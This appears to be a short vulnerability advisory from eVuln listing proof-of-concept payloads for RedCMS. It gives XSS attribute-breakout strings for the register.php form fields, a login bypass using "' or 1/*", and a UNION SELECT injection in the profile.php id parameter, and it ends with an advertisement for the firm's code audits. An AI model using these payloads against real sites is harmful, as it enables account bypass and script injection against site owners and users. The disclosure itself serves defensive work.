PoC/Exploit for Multiple XSS and SQL Injection in RedCMS

Published Proof of Concept code - Multiple XSS and SQL Injection in RedCMS.

Description
Available
Solution
Not available - check vendor's website

1. Cross-Site Scripting Example.

URL: http://[host]/redcms/register.php

Email: aaa'>[XSS]<aaa aaa=';

Location: aaa'>[XSS]<aaa aaa=';

Website: aaa'>[XSS]<aaa aaa=';

2. SQL Injection Examples.

URL: http://[host]/redcms/login.php

Username: ' or 1/*

Password: any

URL: http://[host]/redcms/profile.php? id=99'%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,161,7,18,19,20/*

Order Source Code Audit made by eVuln

Protect against hacking by source code review of your website or web application made by our team.The order will be done by experts in web security.

Advisories by vuln type